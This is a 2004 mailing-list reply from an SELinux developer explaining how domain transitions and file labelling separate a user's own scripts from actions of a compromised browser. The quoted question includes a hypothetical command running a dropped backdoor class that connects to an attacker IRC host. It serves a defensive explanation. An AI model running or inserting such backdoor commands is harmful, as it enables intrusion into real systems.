SELinux and the Desktop
Stephen Smalley
sds at epoch.ncsc.mil
Thu Oct 14 18:35:39 UTC 2004
On Thu, 2004-10-14 at 13:56, Steve Coleman wrote:
> So just to clarify, whats the difference between a user running a script
> file that does exec "java ./MyClass.class" and a stack overrun causing a
> browser with a smashed stack to save a MyBackdoor.class to the local
> file system and execing "java ./MyBackdoor.class -irc
> blackhathosting.org" ?
Calling context. User is initially in a given domain (e.g. user_t),
runs script file that may or may not transition depending on policy.
Browser runs in a different domain (e.g. user_mozilla_t) that has a
subset of user_t's permissions. Further, files writable by browser
domain are not executable by user directly without explicit relabel by
user. (Note: I don't know if that is still true in the present Fedora
policy, but certainly possible to configure it that way).
> In both cases its the same user, and in both cases its the same java VM
> binary.
SELinux can capture the entire call chain (via execve, not function
calls here) if desired, e.g. distinguishing here on the browser,
although you typically only encode new domains where you cross a trust
boundary.
> The java binary is likely the only process that knows enought to
> enforce anything here based on when, what, and where things are run by
> the user.
SELinux can enforce a coarse-grained policy over the maximum access
granted to the process. But I agree that the VMM ultimately needs some
awareness of security to refine that policy to deal with the
finer-grained internal abstractions it manages. Nonetheless, you don't
want to rely entirely on the VMM's enforcement, as it may be subverted
itself.
--
Stephen Smalley <sds at epoch.ncsc.mil>
National Security Agency
More information about the fedora-selinux-list
mailing list